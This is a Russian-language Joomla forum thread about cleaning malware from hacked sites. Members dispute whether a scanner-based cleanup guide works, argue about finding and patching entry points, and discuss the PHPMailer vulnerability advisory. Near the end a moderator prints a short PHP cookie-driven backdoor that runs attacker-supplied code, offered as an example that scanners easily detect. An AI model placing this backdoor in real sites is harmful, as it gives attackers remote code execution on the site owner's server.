Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 275505 Просмотров
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
Денег сколько?
Например закину архив со всеми php-файлами поизучать.
Смотря что вы хотите получить в итоге. Пишите задание в коммерческий раздел. Кому будет интересно, назовут свою стоимость работ.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

alexzhimuk

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
Смотря что вы хотите получить в итоге. Пишите задание в коммерческий раздел. Кому будет интересно, назовут свою стоимость работ.
Всем спасибо, за топик в том числе. Невнимательно первый раз почистил всё. Сайт проверку Google прошёл.
Теперь буду обновлять систему дальше.
*

maximm

  • Осваиваюсь на форуме
  • 41
  • 0 / 1
Была проблема с несколькими сайтами Joomla. Заразились в январе где то. Долго бился и искал остатки шелов, аплоадеров в папках ссайта. Много искал в интернете инструкций как почистить сайт, но после выполнения всех инструкций оставлаись всё такие ещё какие то лвые файлы. И вот хочу посоветовать инструкцию по моему мнению самую подходящую и понятную для чистки сайтов.
« Последнее редактирование: 03.04.2017, 09:19:50 от flyingspook »
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
Была проблема с несколькими сайтами Joomla. Заразились в январе где то. Долго бился и искал остатки шелов, аплоадеров в папках ссайта. Много искал в интернете инструкций как почистить сайт, но после выполнения всех инструкций оставлаись всё такие ещё какие то лвые файлы. И вот хочу посоветовать инструкцию по моему мнению самую подходящую и понятную для чистки сайтов.

Вы свой сайт рекламируете?

Статья противоречит сама себе. Во первых, не зная PHP, глупо полагаться только на Айболита. Во вторых, не зная PHP, невозможно вылечить сайт. В статье в начале написано, что сайт можно вылечить, не зная PHP, а далее приводятся конструкции кода. Так все таки надо знать или не надо?

Я вам отвечу так: если вы не понимаете, что именно ищите, то и не найдете. И Айболит вам тут не панацея.Он видит многое, но еще большее остается за кадром. Так что если после вашей чистки сайт еще работает и предыдущий взлом себя не проявляет, это еще не говорит о том, что вы решили проблему. Суслик, он такой - думаешь, что его нет, а он есть...
« Последнее редактирование: 03.04.2017, 09:20:39 от flyingspook »
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

maximm

  • Осваиваюсь на форуме
  • 41
  • 0 / 1
Да ничего я не рекламирую, знакомый айтишник дал мне просто эту ссылку и сказал как избавится от моей проблемы. Говорит типа "зае..и вы меня" и написал инструкцию. Да там не только для Joomla она подходит. Инфа кстати намного полезнеее, чем ответы на форумах типа: "обратитесь к профессионалам" или "давайте балло, щас вылечим"
А насчёт знания и не знания PHP там написано, что человек если хотя бы понимает где начинается код PHP а где заканчивается, то можно пользоваться уже инструкцией. А конкретно по Joomla, я себе  ещё Rsfirewall поставил, очень хорошо помогает на изменение оригинальных файлов ядра CMS
« Последнее редактирование: 03.04.2017, 09:39:21 от flyingspook »
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
...знакомый айтишник дал мне просто эту ссылку и сказал как избавится от моей проблемы. Говорит типа "зае..и вы меня" и написал инструкцию.

Не давайте советов на эту тему. Я вчера помимо этого поста еще в трех ваших ответить хотел, где вы в том же ключе высказываетесь. Но оставил их для коллег по цеху. В вкратце - не вылечите вы сайт таким методом. Ну может процентов 10-20 шансов, что вы, используя айболит, удалите малварь и не запорите сайт окончательно. Тут другой подход используется, и заключается не только в чистке, но и комплексном обслуживании, настройке, установке патчей, обновлений и т.д. Как раз этим у нас и занимаются профессионалы. А прогнать айболитом в параноидальном - это не панацея, он не все видит, это раз. И два - нужно самому понимать, что искать и где. И как. Тут одним айболитом не обойтись.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

Septdir

  • Живу я здесь
  • 3370
  • 168 / 4
А зачем здесь вообще на форуме этот раздел с этими темами?) Оставьте один коммерческий раздел и пусть люди туда пишут.
И так полагаю, здесь как раз раздел и тема для того, чтобы давать советы. Я кстати сам намучался уже за январь февраль с этими заражениями, так как у меня не один сайт, и не один хостинг, а на Joomle около 30 сайтов, раскиданных по разным хостингам. И учитывая массовость и однотипность заражения за этот период времени, данные советы будут самыми актуальными и действенными.
Этот раздел здесь именно для советов и обмена мнениями и наработками. Но поймите одно: ни где и ни когда вы не найдете пошаговой инструкции или скрипта который вычистит вам сайт за один клик(любой скрипт это лишь инструмент и без опытных рук он бесполезен). И объяснять про это надоело.
Так же как и про то, что искать надо причину, чего вы в советах так и не сделали.

Как попала кака на сайт? когда это произошло и как это предотвратить в последствии, и только после латания дыр приступают к чистике иначе это мартышкин труд, а иногда и вовсе проще сайт пересобрать, но разуметься не забыв изолировать.


, а именно со следующим содержимым:
Судя по на писаному вами вы не понимаете что это за код, и что по факту это лишь запуск, и без самих функции он бесполезен. Так что удалить то его конечно надо, но вот проблему это не решит.

Далее во всех этих инструкциях меня больше всего веселят фразы типа
Цитировать
Вредоносный код часто использует функции PHP: eval, base64, COOKIES

Ну кроме eval, который используется достаточно редко ибо опасен сам по себе, все остальной используется очень часто к примеру у той же Joomla, да и не только у нее в base64 кодируют url возврата. Ну а про использование печенек и говорить не чего.

Что же до RSFirewall компонент свои заявленные задачи выполняет, но это не защита сайта  и не панацея, а учитывая насколько он нагружает сайт, то оно того не стоит.

Эпилог:
Мы тут не злые дяди и не пытаемся разводить людей на бабки отправляя в ком раздел, но у новичка ни чего не смыслящего в безопасности и кодинге есть только 3 варианта
1. Обратиться к специалисту.
2. Полностью в ручную пресобрать сайт.
3. Научиться - это занимает несколько лет и то далеко не факт что вы это осилите. И чтобы научиться что-то защищать, надо научиться это ломать.
Более того, даже те люди которые отлично знают и способны заниматься чисткой и защитой сайтов, далеко не всего этим занимаются ибо это долгий и кропотливый труд, а такое не каждому по душе.

Да и про 3 заповеди(кстати их больше но 3 звучит лучше, мб кто нибудь из постоянных обитателей раздела сделает топик, а то поднадоело это печатать) безопасности
1. Ни какого варезе - "Ломать и бесплатно раздавать windows - это хобби, а выпускать варезы для сайтов - это бизнес"
2. Всегда только актуальные версии движка и расширений, если вам хоть кто либо скажет да нафиг обновлять когда все работает гоните его в шею.
3. Проверяйте файлы на изменения. Так поймать проблему можно на ранней стадии.

Лечение сайтов - это медицина и не надо пытаться лечить чуму в домашних условиях.
« Последнее редактирование: 02.04.2017, 12:06:15 от Septdir »
Не можете справиться с задачей сами пишите, решу ее за вас, не бесплатно*.
*Интересная задача, Деньги или Бартер. Натурой не беру!
CodersRank | Контакты | Мой GitHub | Workshop
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
Лечение сайтов - это медицина и не надо пытаться лечить чуму в домашних условиях.

Я бы добавил, что не надо давать советов из разряда средств народной медицины. Они не только малоэффективны, но и могут сильно навредить.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

maximm

  • Осваиваюсь на форуме
  • 41
  • 0 / 1
Я бы добавил, что не надо давать советов из разряда средств народной медицины. Они не только малоэффективны, но и могут сильно навредить.
Вы можете вообще привести один пример как можно навредить сайту используя эту инструкцию? Например, приведите полезную строку в начале файла (из дистрибутива, компонентов, шаблонов Joomla), которую можно удалить использую данную инструкцию?
я из 30 сайтов ниодному не навредил
*

Septdir

  • Живу я здесь
  • 3370
  • 168 / 4
Вы можете вообще привести один пример как можно навредить сайту используя эту инструкцию? Например, приведите полезную строку в начале файла (из дистрибутива, компонентов, шаблонов Joomla), которую можно удалить использую данную инструкцию?
А причем тут начало файла? хорошая вредонска сидит в серединке или вовсе подменяет весь файл. Ну а так если следовать заветам сего мастера.
Код
$this->data = & $_COOKIE;
И куки в компонентах работать не будут.
Код
$redirect = base64_decode($returnUri);
И прощай возвраты при сохранении.
И таких случаев целая гора, помню как-то один умелец по такой инструкции снес пол библиотеки fof.
Нет мастерам то конечно не жалко, ставьте варез следуйте инструкциям по чистке, а мы потом за круглую сумму все исправим, благо это не медицина и ни кто кони не двинет.
я из 30 сайтов ниодному не навредил
с 90% вероятностью и не помог =)
P.S Кстати инструкция эта к марту 2017 не имеет ни какого отношения ибо все они по сути одинаковы, да и по просту не могут разными, ибо как устранить проблему в них ни когда не пишут(потому что это не реально написать)=)
Не можете справиться с задачей сами пишите, решу ее за вас, не бесплатно*.
*Интересная задача, Деньги или Бартер. Натурой не беру!
CodersRank | Контакты | Мой GitHub | Workshop
*

robert

  • Живу я здесь
  • 4974
  • 457 / 20
maximm, ваше желание помочь и поделиться своим опытом, конечно, очень похвально. Вам хотят объяснить, что вы пока только устраняете симптомы, а не саму болезнь: эти зловредные коды каким-то образом попадают на ваш сайт, верно? Вы их сегодня удаляете, завтра они опять появятся. А антивирусные расширения всегда опаздывают на шаг, если не на 2, за самими вирусами: чтобы обезвредить вирус, он (вирус) должен сначала проявить себя. Ведь те парни, которые пишут вирусы, не сообщают, какие вирусы они планируют выпускать.
Не будь паразитом, сделай что-нибудь самостоятельно!
*

maximm

  • Осваиваюсь на форуме
  • 41
  • 0 / 1
А причем тут начало файла? хорошая вредонска сидит в серединке или вовсе подменяет весь файл. Ну а так если следовать заветам сего мастера.
Код
$this->data = & $_COOKIE;
И куки в компонентах работать не будут.
Код
$redirect = base64_decode($returnUri);
И прощай возвраты при сохранении.
Ни одного названия переменной из непонятных случайных символов (на чём кстати акцентировано внимание красным цветом в инструкции) в вашем примере я не вижу)
Я понимаю конечно вашу коммерческую заинтересованность  в этом вопросе, но есть люди которые не ленятся, у которых есть время и они хотят самостоятельно разобраться с этой проблемой. Поэтому я считаю, что для таких людей данные разделы форумы и существуют и надо давать более конструктивные ответы, нежели чем перенаправлять в коммерческий раздел. Коммерческий разделы как раз для тех, кто очень ленивый или у которого много других забот, поэтому им то следует как раз пользоваться платными услугами.
*

maximm

  • Осваиваюсь на форуме
  • 41
  • 0 / 1
maximm, ваше желание помочь и поделиться своим опытом, конечно, очень похвально. Вам хотят объяснить, что вы пока только устраняете симптомы, а не саму болезнь: эти зловредные коды каким-то образом попадают на ваш сайт, верно? Вы их сегодня удаляете, завтра они опять появятся. А антивирусные расширения всегда опаздывают на шаг, если не на 2, за самими вирусами: чтобы обезвредить вирус, он (вирус) должен сначала проявить себя. Ведь те парни, которые пишут вирусы, не сообщают, какие вирусы они планируют выпускать.
Robert, да латание дыр, через которые попадают вирусы - это само по себе разумеющееся, я даже и не пишу об этом. Понятно, что это постоянные обновления CMS, воздержание от варезных компонентов и шаблонов, установка компонентов для защиты и т.д.
А для CMS с открытым кодом и тем более таких популярных как Joomla всегда будут обнаруживать уязвимости (даже в стандартных компонентах или ядре).

И так же не забывайте, Robert, про вашу подпись: Не будь паразитом, сделай что-нибудь самостоятельно!
Вот я придерживаюсь такого же мнения, поэтому пытаюсь помочь людям
« Последнее редактирование: 02.04.2017, 12:55:23 от maximm »
*

Septdir

  • Живу я здесь
  • 3370
  • 168 / 4
Ни одного названия переменной из непонятных случайных символов (на чём кстати акцентировано внимание красным цветом в инструкции) в вашем примере я не вижу)
Вот в этом и наша с вам разница, кто вам сказал что переменные должны быть не понятными во вредоноски и понятными в хорошем коде?
Бывает так что пишешь что нибудь в запере или ночью, а на сл. день уже сам в шоке как обозвал перемененные. Например когда пишу в соло код и не фига не выходит переменная типа $asdf вполне обычное дело, это конечно неправильно, но такое иногда бывает. Да и вприципе название непременной ни говорит ни о чем, к примеру $return(возврат) даже с комментом, ни расскажет вам как этот возрать работает и что в итоге делает.

Я понимаю конечно вашу коммерческую заинтересованность  в этом вопросе, но есть люди которые не ленятся, у которых есть время и они хотят самостоятельно разобраться с этой проблемой.
Да нет у меня коммерческой заинтересованности, я отношусь к тем людям которые отлично это все знают и могут занимать чисткой, но на дух это не выносят. Ибо это нудная и кропотливая работа а такое не по мне. Тут на чистке специализируються в основном те у кого это в подписи, так и написано. Чистка сайтов.

Поэтому я считаю, что для таких людей данные разделы форумы и существуют и надо давать более конструктивные ответы, нежели чем перенаправлять в коммерческий раздел. Коммерческий разделы как раз для тех, кто очень ленивый или у которого много других забот, поэтому им то следует как раз пользоваться платными услугами.
Если человек хочет научиться, он воспользуется поиском, засядет за учебеники, а если и задаст вопрос на форуме, то он будет конкретным по одному из аспектов.  А когда человек задает вопрос, как мне вылечить сайт, то ответ простой в коммерческий раздел. Ибо если человек задает иммено такой вопрос, то и знаний необходимых для лечения у него нет, да и по искать по сети и даже по форуму ему лень. А вот если бы ему было не лень он бы нашел все что нужно для начала обучения. А так же прочел бы что на это уходят годы и то не факт что вы чему-то научитесь.
Я еще раз напомню про схожесть с медициной и даже приведу пример.
У человека X 2 недели жуткая мигрень каждый день, Он просто каждый день пьет таблетку и боль проходит, а через пол года(честно хз через сколько)Он умирает от опухоли мозга или инсульта, а ведь если бы он сразу к врачу, то его бы вылечили. А не обратился он потому что прочитал в интернете, что мигрень типа от стресса или реакцию на погоду и т.д.

Вот не в обиду честно. Просто ответьте на вопрос, который вам уже задави ни раз. Следуя этой инструкции как предотвратить попадание "однотипного  вредоносного кода марта 2017" к себе на сайт.

P.S кстати с точки зрения коммерции, пытаться это каждый раз кому разжевывать не выгодно, проще давать ссылку на такие инструкции, а потом зарабатывать на этих людях.
Не можете справиться с задачей сами пишите, решу ее за вас, не бесплатно*.
*Интересная задача, Деньги или Бартер. Натурой не беру!
CodersRank | Контакты | Мой GitHub | Workshop
*

maximm

  • Осваиваюсь на форуме
  • 41
  • 0 / 1
Вот не в обиду честно. Просто ответьте на вопрос, который вам уже задави ни раз. Следуя этой инструкции как предотвратить попадание "однотипного  вредоносного кода марта 2017" к себе на сайт.

P.S кстати с точки зрения коммерции, пытаться это каждый раз кому разжевывать не выгодно, проще давать ссылку на такие инструкции, а потом зарабатывать на этих людях.

В этой инструкции не указано как предотвратить заражения, там просто указано как лечить сайт (так как она принципе универсальная, как для Joomla, Wordpress, так и для обычных сайтов созданным на HTML + PHP и которые так же подверглись заражению через не изолированные сайты на хостинге) Информации о том как предотвратить заражение в принципе и здесь полно. Да и предотварщение заражения зависит от конкретной CMS
А по поводу коммерции - я не знаю, как из этой подробно разжёванной инструкции можно извлекать прибыль, когда человек изучив её сам может вылечить свой сайт.

Кстати насчёт сравнения с медициной. Если немного поюморить, то можно сказать, что в отличии от медицины в лечении сайтов всегда есть одно неоспоримое преимущество - это "резервная копия")
« Последнее редактирование: 02.04.2017, 13:41:31 от maximm »
*

robert

  • Живу я здесь
  • 4974
  • 457 / 20
И так же не забывайте, Robert, про вашу подпись: Не будь паразитом, сделай что-нибудь самостоятельно!
Вот и славно :)! Я же вас не критиковал, я просто вам объяснил, почему так неодобрительно относятся к вашим советам. Я также не отношусь к спецам по обезвреживанию вирусов, но думаю, что мог бы написать какую-нибудь плохую вещь со всеми eval, base64..., которую ваши айболиты не сразу могут вычислить.
Спойлер
[свернуть]
Не будь паразитом, сделай что-нибудь самостоятельно!
*

Septdir

  • Живу я здесь
  • 3370
  • 168 / 4
В этой инструкции не указано как предотвратить заражения, там просто указано как лечить сайт (так как она принципе универсальная, как для Joomla, Wordpress, так и для обычных сайтов созданным на HTML + PHP и которые так же подверглись заражению через не изолированные сайты на хостинге)
В том то и дело, что в данной статье как и во всех подобных инструкциях(коих на форуме навалом и каждый раз кто нибудь объясняет человеку который ее выложил что она бесполезна ну даже далеко ходить не надо http://joomlaforum.ru/index.php/topic,332948.0.html). По сути все что написано в предложенной вами статье, это как понять что сайт чем-то заражен и возможно, но мало вероятно, очистить последствия.

Информации о том как предотвратить заражение в принципе и здесь полно. Да и предотварщение заражения зависит от конкретной CMS
Но именно эта информация важна. Может вы нашли новую дыру в Joomla или компоненте. А учитывая, это случалось в январе она может быть до сих пор не закрыта и если по ней бьют то ее надо срочно заделать. Но то что вы не указали данную информацию говорит нам о том что вы скорее всего уязвимость даже не искали.

robert, прав желание поделиться информация похвально, вот только данная информация бесполезна и скорее тянет на рекламу сайта, чем на что-то полезное и получается вы делаете медвежью услугу людям, которые действительно верят что сделав все по инструкции они вылечат сайт.  

Кстати насчёт сравнения с медициной. Если немного поюморить, то можно сказать, что в отличии от медицины в лечении сайтов всегда есть одно неоспоримое преимущество - это "резервная копия")
Ох если бы это было так, ни редко люди обращаются за помощь слишком поздно. вирус может дремать годами(для красивости, хотя такое тоже не исключено) и тут тебе ни логов ни возможности понять какой бэкап не заражен.
« Последнее редактирование: 02.04.2017, 17:42:18 от Septdir »
Не можете справиться с задачей сами пишите, решу ее за вас, не бесплатно*.
*Интересная задача, Деньги или Бартер. Натурой не беру!
CodersRank | Контакты | Мой GitHub | Workshop
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
...Так вот, чем больше он узнал, тем больше он чувствовал себя никчемным...
Извиняюсь, что выдернул текст из спойлера, но это можно назвать постулатом. Я раньше думал, что знаю много, но когда начал работать над своей системой безопасности, понял, насколько мои знания никчемны в этой области. И, постоянно открывая что то новое, понимаю, насколько на самом деле сложно обеспечить простейшую безопасность сайта.

maximm, давайте заканчивать эту полемику. Пишите вы грамотно, без ошибок. Но знаний в обасти безопасности у вас мало. Вместо того, что бы признать это, вы пытаетесь защищать и оправдывать себя. Но перед кем? Люди, которые вам пишут, собаку съели на этих сайтах и малвари, живущей в них. Я так же приветствую ваше желание помогать людям, это похвально. Но пожалуйста, постарайтесь глубже погрузиться в эту тему, почитайте другие топики, расширьте свой кругозор. Ведь пока знаний у вас нет, как вам уже сказали - не таблетка от всех болезней.
« Последнее редактирование: 03.04.2017, 09:37:13 от flyingspook »
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

rkron

  • Захожу иногда
  • 316
  • 7 / 0
Собственная безопасность для Joomla? Можно что то улучшить в плане защиты, но коренным образом менять что то сложно.
« Последнее редактирование: 03.04.2017, 09:37:52 от flyingspook »
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
Собственная безопасность для Joomla? Можно что то улучшить в плане защиты, но коренным образом менять что то сложно.
Во первых, она со всеми сайтами работает, независимо от движка. А во вторых, она не является частью какого либо сайта и работает отдельно от него. Вы даже файлов этой системы не увидите, только ее инфостраницу, передав в GET специальный запрос. Я сейчас не готов обсуждать эту работу.
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

rkron

  • Захожу иногда
  • 316
  • 7 / 0
Во первых, она со всеми сайтами работает, независимо от движка. А во вторых, она не является частью какого либо сайта и работает отдельно от него. Вы даже файлов этой системы не увидите, только ее инфостраницу, передав в GET специальный запрос. Я сейчас не готов обсуждать эту работу.
Интересно
*

maximm

  • Осваиваюсь на форуме
  • 41
  • 0 / 1
Собственная безопасность для Joomla? Можно что то улучшить в плане защиты, но коренным образом менять что то сложно.
Коренным образом конечно сложно, особенно от таких критических уязвимостей как в PHPmailer
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Коренным образом конечно сложно, особенно от таких критических уязвимостей как в PHPmailer
Хоть бы почитали перед тем как что-то писать.
Уязвимость в phpmailer не затронула Joomla!!
*

maximm

  • Осваиваюсь на форуме
  • 41
  • 0 / 1
Хоть бы почитали перед тем как что-то писать.
Уязвимость в phpmailer не затронула Joomla!!
а это что тогда такое?
https://developer.joomla.org/security-centre.html
Цитировать
Description

All versions of the third-party PHPMailer library distributed with Joomla! versions up to 3.6.5 are vulnerable to a remote code execution vulnerability. This is patched in PHPMailer 5.2.20 which will be included with Joomla! 3.7. After analysis, the JSST has determined that through correct use of the JMail class, there are additional validations in place which make executing this vulnerability impractical within the Joomla environment. As well, the vulnerability requires being able to pass user input to a message's "from" address; all places in the core Joomla API which send mail use the sender address set in the global configuration and does not allow for user input to be set elsewhere. However, extensions which bundle a separate version of PHPMailer or do not use the Joomla API to send email may be vulnerable to this issue.

Generally, the Joomla project does not issue advisories regarding third party libraries, however given the severity of this issue we felt it important to advise our users that we are aware of this issue and we have determined that the additional validations in our API prevent triggering this vulnerability.

Affected Installs

Joomla! CMS versions 1.5.0 through 3.6.5
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Ну так читайте до конца
Цитировать
Solution

No action required for Joomla users, the updated library will be included in the next scheduled release and additional mechanisms exist in Joomla core to prevent triggering the vulnerability. Users of the PHPMailer library separate from Joomla are advised to upgrade to 5.2.20 or newer ASAP.
Если тяжко с аннглийским, то https://cmscafe.ru/novosti/858-kriticheskaya-uyazvimost-v-phpmailer-ne-povliyaet-na-joomla-cms
Цитировать
Вчера было объявлено о том, что в библиотеке PHPMailer обнаружена критическая уязвимость CVE-2016-1003, которая позволяет удаленно выполнить код в контексте web-сервера и скомпрометировать web-приложение.

Joomla! Security центр сообщает, что это не повлияет на Joomla! CMS, так как стандартные расширения используют класс JMail, который имеет необходимую валидацию, поэтому эксплуатация уязвимости в принципе невозможна. Если сторонние расширения напрямую используют Mailer класс, то эксплуатация уязвимости возможна только в том случае, если форма позволяет пользователю указать адрес "from".
*

maximm

  • Осваиваюсь на форуме
  • 41
  • 0 / 1
Ну так читайте до концаЕсли тяжко с аннглийским, то https://cmscafe.ru/novosti/858-kriticheskaya-uyazvimost-v-phpmailer-ne-povliyaet-na-joomla-cms
Ну так там написано, что уязвимость устраняется после обновления Joomla, а Joomla как Wordpress автоматически не обновляется. Поэтому, кто не успел обновить, тот могу подвергнуться заражению.
*

Septdir

  • Живу я здесь
  • 3370
  • 168 / 4
Коренным образом конечно сложно, особенно от таких критических уязвимостей как в PHPmailer
Ну так там написано, что уязвимость устраняется после обновления Joomla, а Joomla как Wordpress автоматически не обновляется. Поэтому, кто не успел обновить, тот могу подвергнуться заражению.
Чем дальше в лес.... maximm завязывайте.
Не можете справиться с задачей сами пишите, решу ее за вас, не бесплатно*.
*Интересная задача, Деньги или Бартер. Натурой не беру!
CodersRank | Контакты | Мой GitHub | Workshop
*

maximm

  • Осваиваюсь на форуме
  • 41
  • 0 / 1
maximm завязывайте.
Да не вопрос!)
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Код
<?php

$uzg=$_COOKIE;
$bwfbc=$uzg[ovpa];
if($bwfbc){
$bxgc=$bwfbc($uzg[txas]);$dyt=$bwfbc($uzg[vvkn]);$nvdiy=$bxgc("",$dyt);$nvdiy();
}
Такое не найдет только ленивый и дилетант в области безопасности. maximm ваши сообщения похожи на то что просят написать многие "маркетинговые" кодеры, я их порезал и не старайтесь тут писать "псевдо отзывы" не люблю разработчиков которые чужими руками делают такое. Хотите писать отзывы пишите но не тут, а у них на сайте.
Я также не отношусь к спецам по обезвреживанию вирусов, но думаю, что мог бы написать какую-нибудь плохую вещь со всеми eval, base64..., которую ваши айболиты не сразу могут вычислить.
Ну так он и не панацея, с таким поиском справиться любой сканер добавив в базу любого сканера сигнатуру или любой другой якорь поиска. Сейчас уже более десятков разных сканеров, и ни кто не запрещает их использовать, есть в паблике и коммерческие сервисы, выбор можно сказать огромен, а используют их кому какой нравиться, кто то свои пишет.
« Последнее редактирование: 03.04.2017, 09:18:43 от flyingspook »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 495
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 63297
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 1037
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 3026
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 1822
Последний ответ 22.02.2022, 11:38:15
от AlexP750